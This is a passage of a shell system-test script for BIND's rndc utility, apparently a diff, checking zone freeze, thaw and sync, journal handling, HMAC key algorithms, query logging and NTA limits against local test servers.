${PORT} -k ns2/session.key > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text1.nil. 600 IN TXT "addition 1" +send +zone other. +update add text1.other. 600 IN TXT "addition 1" +send +END +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc freeze" +$RNDCCMD 10.53.0.2 freeze | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 1" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 1" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is still present ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone not writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > /dev/null 2>&1 <<END && ret=1 +server 10.53.0.2 +zone nil. +update add text2.nil. 600 IN TXT "addition 2" +send +END + +$DIGCMD @10.53.0.2 text2.nil. TXT > dig.out.1.test$n +grep 'addition 2' dig.out.1.test$n >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc thaw" +$RNDCCMD 10.53.0.2 thaw | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone now writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text3.nil. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.2 text3.nil. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc sync" +ret=0 +$RNDCCMD 10.53.0.2 sync nil | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 3" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 3" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is still present ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone is still writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text4.nil. 600 IN TXT "addition 4" +send +END + +$DIGCMD @10.53.0.2 text4.nil. TXT > dig.out.1.test$n +grep 'addition 4' dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc sync -clean" +ret=0 +$RNDCCMD 10.53.0.2 sync -clean nil | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 4" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 4" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is deleted ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] && { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone is still writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text5.nil. 600 IN TXT "addition 5" +send +END + +$DIGCMD @10.53.0.2 text4.nil. TXT > dig.out.1.test$n +grep 'addition 4' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking other journal files not removed ($n)" +ret=0 +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "cleaning all zones ($n)" +$RNDCCMD 10.53.0.2 sync -clean | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking all journals removed ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] && { + echo_i "'test -s ns2/nil.db.jnl' succeeded when it shouldn't have"; ret=1; +} +[ -s ns2/other.db.jnl ] && { + echo_i "'test -s ns2/other.db.jnl' succeeded when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that freezing static zones is not allowed ($n)" +ret=0 +$RNDCCMD 10.53.0.2 freeze static > rndc.out.1.test$n 2>&1 +grep 'not dynamic' rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that journal is removed when serial is changed before thaw ($n)" +ret=0 +sleep 1 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone other. +update add text6.other. 600 IN TXT "addition 6" +send +END +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +$RNDCCMD 10.53.0.2 freeze other 2>&1 | sed 's/^/ns2 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 6" ns2/other.db > /dev/null && break + sleep 1 +done +serial=`awk '$3 ~ /serial/ {print $1}' ns2/other.db` +newserial=`expr $serial + 1` +sed s/$serial/$newserial/ ns2/other.db > ns2/other.db.new +echo 'frozen TXT "frozen addition"' >> ns2/other.db.new +mv -f ns2/other.db.new ns2/other.db +$RNDCCMD 10.53.0.2 thaw 2>&1 | sed 's/^/ns2 /' | cat_i +sleep 1 +[ -f ns2/other.db.jnl ] && { + echo_i "'test -f ns2/other.db.jnl' succeeded when it shouldn't have"; ret=1; +} +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.2.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone other. +update add text7.other. 600 IN TXT "addition 7" +send +END +$DIGCMD @10.53.0.2 text6.other. TXT > dig.out.1.test$n +grep 'addition 6' dig.out.1.test$n >/dev/null || ret=1 +$DIGCMD @10.53.0.2 text7.other. TXT > dig.out.2.test$n +grep 'addition 7' dig.out.2.test$n >/dev/null || ret=1 +$DIGCMD @10.53.0.2 frozen.other. TXT > dig.out.3.test$n +grep 'frozen addition' dig.out.3.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that journal is kept when ixfr-from-differences is in use ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text6.nil. 600 IN TXT "addition 6" +send +END +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +$RNDCCMD 10.53.0.2 freeze nil 2>&1 | sed 's/^/ns2 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 6" ns2/nil.db > /dev/null && break + sleep 1 +done +serial=`awk '$3 ~ /serial/ {print $1}' ns2/nil.db` +newserial=`expr $serial + 1` +sed s/$serial/$newserial/ ns2/nil.db > ns2/nil.db.new +echo 'frozen TXT "frozen addition"' >> ns2/nil.db.new +mv -f ns2/nil.db.new ns2/nil.db +$RNDCCMD 10.53.0.2 thaw 2>&1 | sed 's/^/ns2 /' | cat_i +sleep 1 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.2.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text7.nil. 600 IN TXT "addition 7" +send +END +$DIGCMD @10.53.0.2 text6.nil. TXT > dig.out.1.test$n +grep 'addition 6' dig.out.1.test$n > /dev/null || ret=1 +$DIGCMD @10.53.0.2 text7.nil. TXT > dig.out.2.test$n +grep 'addition 7' dig.out.2.test$n > /dev/null || ret=1 +$DIGCMD @10.53.0.2 frozen.nil. TXT > dig.out.3.test$n +grep 'frozen addition' dig.out.3.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# temp test +echo_i "dumping stats ($n)" +$RNDCCMD 10.53.0.2 stats +n=`expr $n + 1` +echo_i "verifying adb records in named.stats ($n)" +grep "ADB stats" ns2/named.stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test using second key ($n)" +ret=0 +$RNDC -s 10.53.0.2 -p ${CONTROLPORT} -c ns2/secondkey.conf status > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc dumpdb' on a empty cache ($n)" +ret=0 +rndc_dumpdb ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reload' on a zone with include files ($n)" +ret=0 +grep "incl/IN: skipping load" ns2/named.run > /dev/null && ret=1 +loads=`grep "incl/IN: starting load" ns2/named.run | wc -l` +[ "$loads" -eq 1 ] || ret=1 +$RNDCCMD 10.53.0.2 reload > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 +do + tmp=0 + grep "incl/IN: skipping load" ns2/named.run > /dev/null || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +touch ns2/static.db +$RNDCCMD 10.53.0.2 reload > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 +do + tmp=0 + loads=`grep "incl/IN: starting load" ns2/named.run | wc -l` + [ "$loads" -eq 2 ] || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=$((n+1)) +if $FEATURETEST --md5; then + echo_i "testing rndc with hmac-md5 ($n)" + ret=0 + $RNDC -s 10.53.0.4 -p ${EXTRAPORT1} -c ns4/key1.conf status > /dev/null 2>&1 || ret=1 + for i in 2 3 4 5 6 + do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT1} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping rndc with hmac-md5 ($n)" +fi + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha1 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT2} -c ns4/key2.conf status > /dev/null 2>&1 || ret=1 +for i in 1 3 4 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT2} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha224 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT3} -c ns4/key3.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 4 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT3} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha256 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT4} -c ns4/key4.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT4} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha384 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT5} -c ns4/key5.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 4 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT5} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha512 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 4 5 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key${i}.conf status > /dev/null 2>&1 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing single control channel with multiple algorithms ($n)" +ret=0 +for i in 1 2 3 4 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT7} -c ns4/key${i}.conf status > /dev/null 2>&1 || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing automatic zones are reported ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n || ret=1 +grep "number of zones: 201 (198 automatic)" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with null command ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with unknown control channel command ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf obviouslynotacommand >/dev/null 2>&1 && ret=1 +# rndc: 'obviouslynotacommand' failed: unknown command +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with querylog command ($n)" +ret=0 +# first enable it with querylog on option +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf querylog on >/dev/null 2>&1 || ret=1 +grep "query logging is now on" ns4/named.run > /dev/null || ret=1 +# query for builtin and check if query was logged (without +subnet) +$DIG @10.53.0.4 -p ${PORT} -c ch -t txt foo12345.bind +qr > dig.out.1.test$n 2>&1 || ret=1 +grep "query: foo12345.bind CH TXT.*(.*)$" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=127.0.0.1) +$DIG +subnet=127.0.0.1 @10.53.0.4 -p ${PORT} -c ch -t txt foo12346.bind +qr > dig.out.2.test$n 2>&1 || ret=1 +grep "query: foo12346.bind CH TXT.*\[ECS 127\.0\.0\.1/32/0]" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=127.0.0.1/24) +$DIG +subnet=127.0.0.1/24 @10.53.0.4 -p ${PORT} -c ch -t txt foo12347.bind +qr > dig.out.3.test$n 2>&1 || ret=1 +grep "query: foo12347.bind CH TXT.*\[ECS 127\.0\.0\.0/24/0]" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=::1) +$DIG +subnet=::1 @10.53.0.4 -p ${PORT} -c ch -t txt foo12348.bind +qr > dig.out.4.test$n 2>&1 || ret=1 +grep "query: foo12348.bind CH TXT.*\[ECS ::1/128/0]" ns4/named.run > /dev/null || ret=1 +# toggle query logging and check again +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf querylog > /dev/null 2>&1 || ret=1 +grep "query logging is now off" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (without +subnet) +$DIG @10.53.0.4 -p ${PORT} -c ch -t txt foo9876.bind +qr > dig.out.5.test$n 2>&1 || ret=1 +grep "query: foo9876.bind CH TXT.*(.*)$" ns4/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +RNDCCMD4="$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf" +n=`expr $n + 1` +echo_i "testing rndc nta time limits ($n)" +ret=0 +$RNDCCMD4 nta -l 2h nta1.example > rndc.out.1.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.1.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 1d nta2.example > rndc.out.2.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.2.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 1w nta3.example > rndc.out.3.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.3.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 8d nta4.example > rndc.out.4.test$n 2>&1 +grep "NTA lifetime cannot exceed one week" rndc.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc nta -class option ($n)" +ret=0 +nextpart ns4/named.run > /dev/null +$RNDCCMD4 nta -c in nta1.example > rndc.out.1.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null || ret=1 +$RNDCCMD4 nta -c any nta1.example > rndc.out.2.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null || ret=1 +$RNDCCMD4 nta -c ch nta1.example > rndc.out.3.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null && ret=1 +$RNDCCMD4 nta -c fake nta1.example > rndc.out.4.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null && ret=1 +grep 'unknown class' rndc.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +for i in 512 1024 2048 4096 8192 16384 32768 65536 131072 262144 524288 +do + n=`expr $n + 1` + echo_i "testing rndc buffer size limits (size=${i}) ($n)" + ret=0 + $RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf testgen ${i} 2>&1 > rndc.out.$i.test$n || ret=1 + actual_size=`$GENCHECK rndc.out.$i.test$n` + if [ "$?" = "0" ]; then + expected_size=`expr $i + 1` + if [ $actual_size != $expected_size ]; then ret=1; fi + else + ret=1 + fi + + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "testing rndc -r (show result) ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf -r testgen 0 2>&1 > rndc.out.1.test$n || ret=1 +grep "ISC_R_SUCCESS 0" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with a token containing a space ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf -r flush '"view with a space"' 2>&1 > rndc.out.1.test$n || ret=1 +grep "not found" rndc.out.1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reconfig' with a broken config ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > /dev/null || ret=1 +sleep 1 +mv ns4/named.conf ns4/named.conf.save +echo "error error error" >> ns4/named.conf +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > rndc.out.1.test$n 2>&1 && ret=1 +grep "rndc: 'reconfig' failed: unexpected token" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc status reports failure ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n 2>&1 || ret=1 +grep "reload/reconfig failed" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "restore working config ($n)" +ret=0 +mv ns4/named.conf.save ns4/named.conf +sleep 1 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > /dev/null || ret=1 +sleep 1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check 'rndc status' 'reload/reconfig failure' is cleared after successful reload/reconfig ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n 2>&1 || ret=1 +grep "reload/reconfig failed" rndc.out.1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test read-only control channel access ($n)" +ret=0 +$RNDCCMD 10.53.0.5 status > rndc.out.1.test$n 2>&1 || ret=1 +$RNDCCMD 10.53.0.5 nta -dump > rndc.out.2.test$n 2>&1 || ret=1 +$RNDCCMD 10.53.0.5 reconfig > rndc.out.3.test$n 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test rndc status shows running on ($n)" +ret=0 +$RNDCCMD 10.53.0.5 status > rndc.out.1.test$n 2>&1 || ret=1 +grep "^running on " rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reconfig' with loading of a large zone ($n)" +ret=0 +cur=`awk 'BEGIN {l=0} /^/ {l++} END { print l }' ns6/named.run` +cp ns6/named.conf ns6/named.conf.save +echo "zone \"huge.zone\" { type primary; file \"huge.zone.db\"; };" >> ns6/named.conf +echo_i "reloading config" +$RNDCCMD 10.53.0.6 reconfig > rndc.out.1.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +sleep 1 +n=`expr $n + 1` +echo_i "check if zone load was scheduled ($n)" +grep "scheduled loading new zones" ns6/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check if query for the zone returns SERVFAIL ($n)" +$DIG @10.53.0.6 -p ${PORT} -t soa huge.zone > dig.out.1.test$n +grep "SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed (ignored)"; ret=0; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "wait for the zones to be loaded ($n)" +ret=1 +try=0 +while test $try -lt 180 +do + sleep 1 + sed -n "$cur,"'$p' < ns6/named.run | grep "any newly configured zones are now loaded" > /dev/null && { + ret=0 + break + } + try=`expr $try + 1` +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check if query for the zone returns NOERROR ($n)" +$DIG @10.53.0.6 -p ${PORT} -t soa huge.zone > dig.out.1.test$n +grep "NOERROR" dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "verify that the full command is logged ($n)" +ret=0 +$RNDCCMD 10.53.0.2 null with extra arguments > /dev/null 2>&1 +grep "received control channel command 'null with extra arguments'" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +mv ns6/named.conf.save ns6/named.conf +sleep 1 +$RNDCCMD 10.53.0.6 reconfig > /dev/null || ret=1 +sleep 1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ -x "$PYTHON" ]; then + n=`expr $n + 1` + echo_i "test rndc python bindings ($n)" + ret=0 + $PYTHON > python.out.1.test$n << EOF +import sys +sys.path.insert(0, '../../../../bin/python') +from isc import * +r = rndc(('10.53.0.5', ${CONTROLPORT}), 'hmac-sha256', '1234abcd8765') +result = r.call('status') +print(result['text']) +EOF + grep 'server is up and running' python.out.1.test$n > /dev/null 2>&1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +n=`expr $n + 1` +echo_i "check 'rndc \"\"' is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.2 "" > rndc.out.1.test$n 2>&1 && ret=1 +grep "rndc: '' failed: failure" rndc.out.1.test$n > /dev/null +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc -4 -6 ($n)" +ret=0 +$RNDCCMD 10.53.0.2 -4 -6 status > rndc.out.1.test$n 2>&1 && ret=1 +grep "only one of -4 and -6 allowed" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc -4 with an IPv6 server address ($n)" +ret=0 +$RNDCCMD fd92:7065:b8e:ffff::2 -4 status > rndc.out.1.test$n 2>&1 && ret=1 +grep "address family not supported" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc nta reports adding to multiple views ($n)" +ret=0 +$RNDCCMD 10.53.0.3 nta test.com > rndc.out.test$n 2>&1 || ret=1 +lines=`cat rndc.out.test$n | wc -l` +[ ${lines:-0} -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check 'rndc retransfer' of primary error message ($n)" +ret=0 +$RNDCCMD 10.53.0.2 retransfer nil > rndc.out.test$n 2>&1 && ret=1 +grep "rndc: 'retransfer' failed: failure" rndc.out.test$n > /dev/null || ret=1 +grep "retransfer: inappropriate zone type: primary" rndc.out.test$n > /dev/null || ret=1 +lines=`cat rndc.out.test$n | wc -l` +[ ${lines:-0} -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check 'rndc freeze' with in-view zones works ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf freeze > rndc.out.test$n 2>&1 || ret=1 +test -s rndc.out.test$n && sed 's/^/ns2 /' rndc.out.test$n | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking non in-view zone instance is not writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} > /dev/null 2>&1 <<END && ret=1 +server 10.53.0.4 +zone example. +update add text2.example. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.4 -p ${PORT} text2.example. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc thaw' with in-view zones works ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf thaw > rndc.out.test$n 2>&1 || ret=1 +test -s rndc.out.test$n && sed 's/^/ns2 /' rndc.out.test$n | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking non in-view zone instance is now writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} > nsupdate.out.test$n 2>&1 <<END || ret=1 +server 10.53.0.4 +zone example. +update add text2.example. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.4 -p ${PORT} text2.example. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking initial in-view zone file is loaded ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.1.test$n +grep 'include 1' dig.out.1.test$n >/dev/null || ret=1 +TSIG="$DEFAULT_HMAC:ext:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" 